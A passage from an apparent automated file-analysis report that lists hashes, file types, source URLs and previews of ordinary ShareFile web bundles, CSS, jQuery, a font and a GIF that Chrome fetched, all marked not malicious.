                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevremediationpilet,{"@citrite/citrix-ui@25.46.0":"citrite-citrix-ui.js"}).System.register(["@citrite/citrix-ui@25.46.0","@sharefiledev/antd-config","antd","react","tslib"],(function(e,t){var r={},n={},o={},a={},i={};return{setters:[function(e){r.notifyError=e.notifyError,r.notifyInfo=e.notifyInfo,r.notifySuccess=e.notifySuccess},function(e){n.AntDConfigProvider=e.AntDConfigProvider,n.colorPalette=e.colorPalette},function(e){o.Button=e.Button,o.Card=e.Card,o.Col=e.Col,o.Divider=e.Divider,o.Flex=e.Flex,o.Modal=e.Modal,o.Row=e.Row,o.Space=e.Space,o.Switch=e.Switch,o.Tooltip=e.Tooltip,o.Typography=e.Typography,o.theme=e.theme},function(e){a.Fragment=e.Fragment,a.createContext=e.createContext,a.createElement=e.createElement,a.default=e.default,a.forwardRef=e.forwardRef,a.useContext=e.useContext,a.useEffect=e.useEffect,a.useRef=e.useRef,a.useState=e.useState},function(e){i.__awaiter=e.__awaiter}],execute:function(){e((()=>{var e,l,s={8569:(e,t,r)=>{"use
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:H+uZYn:euZYn
                                                                                                                                                                                                                      MD5:46DF3E5E2D15256CA16616EBFDA5427F
                                                                                                                                                                                                                      SHA1:BE8F9B307E458075DA0D43585A05F1D451469182
                                                                                                                                                                                                                      SHA-256:AF3248D0B278571EFF9A22F8ED1CEB54B70D202B44FD70ECA4CA13A5771CECC3
                                                                                                                                                                                                                      SHA-512:88FBCC0A92317A0BADE7D4B72C023A16792F3728443075BF4B1767C8A55258836B54D56B24EABE36AE4EF240F796B58B8F1EA10C7E3C146BDE89882FC9ADE302
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSEAlfsDTG1iF7RhIFDZFhlU4=?alt=proto
                                                                                                                                                                                                                      Preview:CgkKBw2RYZVOGgA=
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (53925)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):80657
                                                                                                                                                                                                                      Entropy (8bit):5.013109282355643
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:XtfZwI9Djuey8kg9XtwVP3K3Ip9LWc5wLVvTwZ6LqDQPciVTz3BWX+ccggffUpAo:bDIX3UVT6C4xe8ZDp1y2xbMaVtAhHS
                                                                                                                                                                                                                      MD5:3EFBAE3E8929430A8D33717801E9C89C
                                                                                                                                                                                                                      SHA1:82D05FE3B9D03DEC0081932CE98B0BB8D2D14520
                                                                                                                                                                                                                      SHA-256:5764E77F219A80CB4F8C1462A3004FF53CAA334A7B2AB30D956F211C3292006F
                                                                                                                                                                                                                      SHA-512:93400A8CCD8FE40456C93530C822F6C672EBE9062A4D301FC66F67C03FAC5D426ED74A355A1709C0F1FEA15A0214D07384EA8005720C40B21F7D26B98D9D48B5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-fileviewer-pilet/1.32.0/package/dist/main.css
                                                                                                                                                                                                                      Preview:.dialog{--dialog-bg-color:#fff;--dialog-border-color:#fff;--dialog-shadow:0 2px 14px 0 rgba(58,57,68,.2);--text-primary-color:#15141a;--text-secondary-color:#5b5b66;--hover-filter:brightness(0.9);--focus-ring-color:#0060df;--focus-ring-outline:2px solid var(--focus-ring-color);--link-fg-color:#0060df;--link-hover-fg-color:#0250bb;--separator-color:#f0f0f4;--textarea-border-color:#8f8f9d;--textarea-bg-color:#fff;--textarea-fg-color:var(--text-secondary-color);--radio-bg-color:#f0f0f4;--radio-checked-bg-color:#fbfbfe;--radio-border-color:#8f8f9d;--radio-checked-border-color:#0060df;--button-secondary-bg-color:#f0f0f4;--button-secondary-fg-color:var(--text-primary-color);--button-secondary-border-color:var(--button-secondary-bg-color);--button-secondary-hover-bg-color:var(--button-secondary-bg-color);--button-secondary-hover-fg-color:var(--button-secondary-fg-color);--button-secondary-hover-border-color:var(--button-secondary-hover-bg-color);--button-primary-bg-color:#0060df;--button-prim
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65472)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):113286
                                                                                                                                                                                                                      Entropy (8bit):5.351711706081523
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:Zp0YYZTGAE4c28qG5QZBWTO3USvODq6ItIeKCEtRgn2PwBW0dvKT:Zp0Y+RiOEMoglRZKT
                                                                                                                                                                                                                      MD5:2C38C5498D5FB32EC1F06835620A80B8
                                                                                                                                                                                                                      SHA1:C7C604C6A1179D6D402164B321088E118A4C8321
                                                                                                                                                                                                                      SHA-256:90AEA3E25E9064E6293A290587C5EA08A52F98A8D67BFC28A904AA82DC42A8C8
                                                                                                                                                                                                                      SHA-512:5402605B0916CC1C800E76CEE01A83C5F8931C4B1B0DA11E6CD262B6E51FCBBE9F8CF2E1186CA2FE68F41839D23F7B452E22E7F6DB0BBBD452154FC6CCF5B213
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-audit-collector-pilet/0.20.0/package/dist/index.js
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevauditcollectorpilet,{}).System.register(["antd","react","tslib"],(function(e,t){var r={},n={},o={};return Object.defineProperty(n,"__esModule",{value:!0}),{setters:[function(e){r.App=e.App,r.Button=e.Button,r.DatePicker=e.DatePicker,r.Form=e.Form,r.Input=e.Input,r.Space=e.Space,r.Spin=e.Spin},function(e){Object.keys(e).forEach((function(t){n[t]=e[t]}))},function(e){o.__awaiter=e.__awaiter}],execute:function(){e((()=>{var e,i,a,s,c={4386:(e,t,r)=>{"use strict";r.d(t,{j:()=>u});var n=r(8109);function o(e){return o="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},o(e)}function i(){i=function(){return t};var e,t={},r=Object.prototype,n=r.hasOwnProperty,a=Object.defineProperty||function(e,t,r){e[t]=r.value},s="function"==typeof Symbol?Symbol:{},c=s.iterator||"@@iterator",u=s.asyncIterator||"@@asyncIte
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65475)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):81331
                                                                                                                                                                                                                      Entropy (8bit):5.28868540855579
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:ednFi2GOnGcqas8WOwmABk4u4tBjFH1hb6R0S3ktwt:l2aO/n4uMc
                                                                                                                                                                                                                      MD5:F5C878BF1F86B436056E3368C95BF75A
                                                                                                                                                                                                                      SHA1:F667FA246032D74512EEDDC2F976682373042B3E
                                                                                                                                                                                                                      SHA-256:90E738555816183FE29DB00A8CEFDFF2CBDC892A3BD4BEE38B718F9BD36FEF7F
                                                                                                                                                                                                                      SHA-512:1C06C29610689E70CAAE071F9900E8519E461144D9E1908D440AF0468C8D752478ADA3A8BF269D4083588BC470D3C93F506DC1D0978CCA3C84D23FB223FDD0AF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-permissions-pilet/1.118.39/package/dist/index.js
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevpermissionspilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={},s={},u={};return Object.defineProperty(i,"__esModule",{value:!0}),{setters:[function(e){n.AccountsEntity=e.AccountsEntity,n.ContactListType=e.ContactListType,n.ContactsEntity=e.ContactsEntity,n.UserRole=e.UserRole},function(e){r.colorPalette=e.colorPalette,r.sizes=e.sizes},function(e){o.Alert=e.Alert,o.Avatar=e.Avatar,o.Badge=e.Badge,o.Button=e.Button,o.Card=e.Card,o.Checkbox=e.Checkbox,o.Col=e.Col,o.Collapse=e.Collapse,o.Divider=e.Divider,o.Drawer=e.Drawer,o.Dropdown=e.Dropdown,o.Flex=e.Flex,o.Form=e.Form,o.Input=e.Input,o.Layout=e.Layout,o.List=e.List,o.Modal=e.Modal,o.Popconfirm=e.Popconfirm,o.Row=e.Row,o.Select=e.Select,o.Skeleton=e.Skeleton,o.Space=e.Space,o.Spin=e.Spin,o.Switch=e.Switch,o.Tooltip=e.Tooltip,o.Typography=e.Typography,o.notification=e.notification
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65479)
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):167028
                                                                                                                                                                                                                      Entropy (8bit):5.295519979527004
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3072:Ze10ed17nqzxppbm/Lgh1aaZV0YYLAbafAbKcPu4TlhV4i:4Cs17nqzxppbsAbaIbKyu4h
                                                                                                                                                                                                                      MD5:D415917C44EDB49D2128CF696D92474C
                                                                                                                                                                                                                      SHA1:C97E2316EDEC31A6E56CF0C7DA7A61EDF8CDF316
                                                                                                                                                                                                                      SHA-256:6ECF8E88C098C14C975873C9EDC0C842F5FC17B03B2FB52291DCE1266F23C124
                                                                                                                                                                                                                      SHA-512:68D8A8DAEA2810E490FDD1A33499BCC0277971A264C436EA94D2EF55A52708D7422470370333615827D044211F5DBE26C673C5B2A0B5B9E897DB98E66F20FE55
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevrubiconpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},i={},o={},s={},a={},u={},c={};return Object.defineProperty(o,"__esModule",{value:!0}),Object.defineProperty(c,"__esModule",{value:!0}),{setters:[function(e){n.UserRole=e.UserRole},function(e){r.sizes=e.sizes},function(e){i.Alert=e.Alert,i.App=e.App,i.Button=e.Button,i.Carousel=e.Carousel,i.Checkbox=e.Checkbox,i.Col=e.Col,i.Divider=e.Divider,i.Drawer=e.Drawer,i.Flex=e.Flex,i.Form=e.Form,i.Grid=e.Grid,i.Image=e.Image,i.Input=e.Input,i.Layout=e.Layout,i.List=e.List,i.Menu=e.Menu,i.Modal=e.Modal,i.Popconfirm=e.Popconfirm,i.Result=e.Result,i.Row=e.Row,i.Skeleton=e.Skeleton,i.Space=e.Space,i.Spin=e.Spin,i.Tag=e.Tag,i.Tooltip=e.Tooltip,i.Typography=e.Typography,i.theme=e.theme},function(e){Object.keys(e).forEach((function(t){o[t]=e[t]}))},function(e){s.createPortal=e.createPort
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65473)
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):77544
                                                                                                                                                                                                                      Entropy (8bit):5.226997072902139
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:ZxeqtFeuD00I4prvOSTLzY7xfNQ87+Ynj2TTo86lUxL1ohA84LijsCul3qC/pbNm:Z11ZvFnKxfNQ87+Yw0j4Ghy2Gfylz9
                                                                                                                                                                                                                      MD5:7B642EB641428D924027759152BD26F4
                                                                                                                                                                                                                      SHA1:766963F144406D2019108B5D88F94A5442E8EF14
                                                                                                                                                                                                                      SHA-256:EB209A2C45816EAD1F57DD45FDDA92ECF0B25D8EE874523DE3C0ECA3E7B3C6FE
                                                                                                                                                                                                                      SHA-512:FD7636C1A83F2105EB181341700BAD335744E995764072503F0C7A000DD01AB30E6AC7D04B9EB2C9E83E58B4EA8678BDE582F4157B482BA6FD6A56AE8589C6DF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevconversationspilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(t,e){var n={},r={},i={},s={},a={},o={},u={},c={};return Object.defineProperty(s,"__esModule",{value:!0}),{setters:[function(t){n.Api=t.Api,n.ItemsEntity=t.ItemsEntity,n.Uploader=t.Uploader,n.UsersEntity=t.UsersEntity,n.ZoneService=t.ZoneService,n.createFile=t.createFile},function(t){r.colorPalette=t.colorPalette,r.sizes=t.sizes},function(t){i.Avatar=t.Avatar,i.Badge=t.Badge,i.Button=t.Button,i.Flex=t.Flex,i.Form=t.Form,i.Grid=t.Grid,i.Input=t.Input,i.Skeleton=t.Skeleton,i.Spin=t.Spin,i.Typography=t.Typography,i.notification=t.notification,i.theme=t.theme},function(t){Object.keys(t).forEach((function(e){s[e]=t[e]}))},function(t){a["default"]=t["default"],a.findDOMNode=t.findDOMNode,a.flushSync=t.flushSync},function(t){o.useHistory=t.useHistory},function(t){u.Link=t.Link,u.useHistory=t
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65399)
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):904512
                                                                                                                                                                                                                      Entropy (8bit):5.71994782288608
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12288:qfKDRWFuEqilY7RuaOoFyXP10uAxa9WA3mVj/jEphnAj3wdArqUP4NqclO:qfKDlEqilY7Ru1SVoirqUP4NqclO
                                                                                                                                                                                                                      MD5:4BCA71B5E96BA1017D2F126850C99835
                                                                                                                                                                                                                      SHA1:E48A42C801197D142912941554398979EEE0A639
                                                                                                                                                                                                                      SHA-256:6B98719775F73C629E39427EDF4D3A67506C6AF5E7ED2C9C80F630A1EE0ED03E
                                                                                                                                                                                                                      SHA-512:9524339F39E746523AC7931388045BB5DDDDDD7D7E777543236188B95C78E4FEF1A493045C8BD6E48BC52B55017B3EE44B6A6E7577235AF6FA8C101D277F273B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevthreatalertmgtpilet,{"@citrite/citrix-ui@25.46.0":"citrite-citrix-ui.js"}).System.register(["react","@citrite/citrix-ui@25.46.0","tslib","react-dom"],(function(e,t){var n={},r={},o={},i={};return Object.defineProperty(n,"__esModule",{value:!0}),{setters:[function(e){Object.keys(e).forEach((function(t){n[t]=e[t]}))},function(e){r.AlertErrorIcon=e.AlertErrorIcon,r.Button=e.Button,r.Checkbox=e.Checkbox,r.CircleOutlinedXIcon=e.CircleOutlinedXIcon,r.EmptyState=e.EmptyState,r.LoadingPrimary=e.LoadingPrimary,r.PageTitle=e.PageTitle,r.SettingsField=e.SettingsField,r.ThemeColor=e.ThemeColor,r.Toggle=e.Toggle,r.fromThemeColors=e.fromThemeColors,r.notifyError=e.notifyError,r.notifySuccess=e.notifySuccess},function(e){o.__assign=e.__assign,o.__awaiter=e.__awaiter},function(e){i["default"]=e["default"],i.findDOMNode=e.findDOMNode,i.flushSync=e.flushSync}],execute:function(){e((()=>{var e={9272:(e,t,n)=>{"use strict";var r=n(723),o=[],i=[],a=r.makeRequestCallF
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (46236)
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):133363
                                                                                                                                                                                                                      Entropy (8bit):5.385698488954991
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3072:Vst4ceI7j1jcp0TRQ8Up0yR+SFpmrIORYo:Gt/n7jxcp0sp0PSFpmb
                                                                                                                                                                                                                      MD5:13DC49E47065015D15EF3BAFE1F88202
                                                                                                                                                                                                                      SHA1:34EECBB791D1B71783D5C3E43C02AA7F6DBD57D7
                                                                                                                                                                                                                      SHA-256:B99BBE311D0388066430D45B8377348E9C52ED029EB79AAF4E7211CBF92EB8A6
                                                                                                                                                                                                                      SHA-512:C3955D865F846E475AAF8C9879E5C89E0C92511718F28A71257FD7E0AEF5384C9FF7A6EB793C15574AB0022B2144BCD2380A8E35FBFB003072B6B9C286A37A49
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevdynamicformspilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(e,t){var r={},n={},o={},i={},a={},s={},c={};return Object.defineProperty(i,"__esModule",{value:!0}),Object.defineProperty(c,"__esModule",{value:!0}),{setters:[function(e){r.ItemsEntity=e.ItemsEntity,r.Uploader=e.Uploader,r.UserRole=e.UserRole,r.UsersEntity=e.UsersEntity,r.ZoneService=e.ZoneService,r.createFile=e.createFile},function(e){n.colorPalette=e.colorPalette,n.sizes=e.sizes},function(e){o.Alert=e.Alert,o.App=e.App,o.Badge=e.Badge,o.Breadcrumb=e.Breadcrumb,o.Button=e.Button,o.Card=e.Card,o.Checkbox=e.Checkbox,o.Col=e.Col,o.Collapse=e.Collapse,o.DatePicker=e.DatePicker,o.Divider=e.Divider,o.Drawer=e.Drawer,o.Dropdown=e.Dropdown,o.Empty=e.Empty,o.Flex=e.Flex,o.Form=e.Form,o.Input=e.Input,o.InputNumber=e.InputNumber,o.Layout=e.Layout,o.Modal=e.Modal,o.Pagination=e.Pagination,o.Popconfirm=e.Popcon
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):89501
                                                                                                                                                                                                                      Entropy (8bit):5.289893677458563
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                                                      MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                                      SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                                      SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                                      SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65476)
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):355264
                                                                                                                                                                                                                      Entropy (8bit):5.467504857512104
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3072:q1PjOU57Zc1mkC07CJ4Fa8aQsrZQDty9N7RrOC4i3Ag1HJuufQPUoHwDPbRrwy4k:q5O2f4uQFtW47LM
                                                                                                                                                                                                                      MD5:CD405D48FDFD34CB6BE76832783F37FC
                                                                                                                                                                                                                      SHA1:FDBDB25E7AD92F6FD62795628245DE63889260C8
                                                                                                                                                                                                                      SHA-256:87B9B8A9111F396AAD39CFBD33812CC9DB2F5F0C2B27C103E3D9F54F4A68A092
                                                                                                                                                                                                                      SHA-512:27D0C4BB8D4DC7DCF685F6CB44281F9DC5FCD5B71C9428ED173522C933C59051CE209FEF9104E96F0C48E700F15F13F4459C81721B23982872C6DA0386B25223
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevclientdashboard,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-router-dom","tslib"],(function(e,t){var n={},r={},l={},o={},i={},c={};return{setters:[function(e){n.AccountsEntity=e.AccountsEntity,n.ItemsEntity=e.ItemsEntity},function(e){r.colorPalette=e.colorPalette,r.sizes=e.sizes},function(e){l.Avatar=e.Avatar,l.Button=e.Button,l.Divider=e.Divider,l.Dropdown=e.Dropdown,l.Flex=e.Flex,l.Grid=e.Grid,l.Image=e.Image,l.Layout=e.Layout,l.Popover=e.Popover,l.Skeleton=e.Skeleton,l.Space=e.Space,l.Spin=e.Spin,l.Typography=e.Typography,l.theme=e.theme},function(e){o.Children=e.Children,o.Fragment=e.Fragment,o.Suspense=e.Suspense,o.createContext=e.createContext,o.createElement=e.createElement,o["default"]=e["default"],o.forwardRef=e.forwardRef,o.isValidElement=e.isValidElement,o.lazy=e.lazy,o.useCallback=e.useCallback,o.useContext=e.useContext,o.useEffect=e.useEffect,o.useLayoutEffect=e.useLayoutEffect,o.useMemo=e.
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 41268, version 1.0
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):41268
                                                                                                                                                                                                                      Entropy (8bit):7.995563635685618
                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                      SSDEEP:768:1z5A/nM7tFabxOf16mHI2tu3TJdcy6J01EenQHsmNQZ60G8MkMV:1aPMhFabxK6PzcJ0ueQXNQZ6J8MF
                                                                                                                                                                                                                      MD5:B9EB4972777F0182FE841BBC280E5CDE
                                                                                                                                                                                                                      SHA1:EDC69B1AA4B56048EA6B5C0217DABE8144036E25
                                                                                                                                                                                                                      SHA-256:D37AB938D33FE41FEC69CC38C301A5AB7CB5AB928DBA29D9E9407582E08D3D24
                                                                                                                                                                                                                      SHA-512:9575EC043889C64BF8B6C2055BDC6EAB943F0626BFAADE0A11006D5409DC2B4681AE4E789F5D3B06CB0DC047AE4A9F03CBE1EB80349D53ED24316D84F34A991C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-dynamic-forms-pilet/1.39.0/package/dist/d8fcf3851ba79b1d138a.woff2
                                                                                                                                                                                                                      Preview:wOF2.......4.......H....................................\.`..D.`........d.. .6.$..T..,.. ..2..;..=[....U...O*c@...~.8..3.dn.~..6:.......V}..........nR.C..i..]....C..F.....jA.....*.S.....*..K..Q.B.5w.P...4...~..T-A......[.Z.h...8-O-...2.%3...y.\d..A.0.Go..s..........\.GX..a...V....\.pK...t.5P......)Y2.cC..~..Z....V..!v..%.."....7.Ut..qgA..5..sJ...|...4....Y)......+9.!...,...Y.=W9..p<.........?.i..88..p..].G....c.$J.Y..z...'.h.g..sy.....9=..oq..!...P...L.[.....G..:.ss(..T.1.W.U.l.........Qmb....,.o...G...{o..?...o.;.#f....[".... ..H.4..xx.{w...*.5..,/!.L.i.#.DZZ...HK.%N..Om...B.$....a..#mj.Y....|.F{......HV..e/S.Z.#...j..l.....b].....eX/!<....f,vf..;........1wG|..6.L.}.!.!.$..5.{r..a.|. ........W...._*.'..L.4Dd3..Z.........l..t..b..%.?K>......\T.Mx...d.&A...Q....]uer.........xq.%l......h8m.*.......E.%|..?.Y...\....A[4f1.S...Z.)..e.!.$.....Ki.N.P.m.Ccl..j..;.... .?.qJ..\..<...^@..H..9klj..m.........@.......VoD\.^&0.3...5+#..N;.R.%...W#..S2.[..@.l.1!$
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):24
                                                                                                                                                                                                                      Entropy (8bit):2.459147917027245
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                                                      MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                                                      SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                                                      SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                                                      SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview:GIF89a.......,..........
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65479)
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):199868
                                                                                                                                                                                                                      Entropy (8bit):5.41109186682965
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3072:exZgYtWppRoZcOI449yoDlPbOG4rlAU/XIdlT2pm:exqmWppRoj549yuCG4rl5/eT2M
                                                                                                                                                                                                                      MD5:114E798D503A347AAB2A537702E1593F
                                                                                                                                                                                                                      SHA1:EDC8A8C19A54D81944F8EA870D826E06A7362161
                                                                                                                                                                                                                      SHA-256:091AB89F90FE0DBAEDE5C8C9C5308C702C75D49A9CD809CECB9F001F98788C38
                                                                                                                                                                                                                      SHA-512:06CE751BE294ABF4D171F9A9BA070FEBB75A29E45615125F3AD8E9D1905A8484E990CB7CD97092F2953E3FBF1596B4617933FF85C3EA74F40C5FB94237E80DC3
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevtaskmgtpilet,{}).System.register(["@sharefiledev/antd-config","antd","react","react-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={};return Object.defineProperty(o,"__esModule",{value:!0}),Object.defineProperty(i,"__esModule",{value:!0}),{setters:[function(e){n.sizes=e.sizes},function(e){r.Alert=e.Alert,r.Button=e.Button,r.Card=e.Card,r.Col=e.Col,r.Divider=e.Divider,r.Empty=e.Empty,r.Flex=e.Flex,r.Input=e.Input,r.Layout=e.Layout,r.Menu=e.Menu,r.Popconfirm=e.Popconfirm,r.Result=e.Result,r.Row=e.Row,r.Select=e.Select,r.Skeleton=e.Skeleton,r.Space=e.Space,r.Spin=e.Spin,r.Tabs=e.Tabs,r.Typography=e.Typography,r.theme=e.theme},function(e){Object.keys(e).forEach((function(t){o[t]=e[t]}))},function(e){Object.keys(e).forEach((function(t){i[t]=e[t]}))},function(e){a.__assign=e.__assign,a.__awaiter=e.__awaiter,a.__generator=e.__generator,a.__makeTemplateObject=e.__makeTemplateObject,a.__spreadArray=e.__spreadArray}],execute:function(){e((()=>{var
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65479)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):199868
                                                                                                                                                                                                                      Entropy (8bit):5.41109186682965
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3072:exZgYtWppRoZcOI449yoDlPbOG4rlAU/XIdlT2pm:exqmWppRoj549yuCG4rl5/eT2M
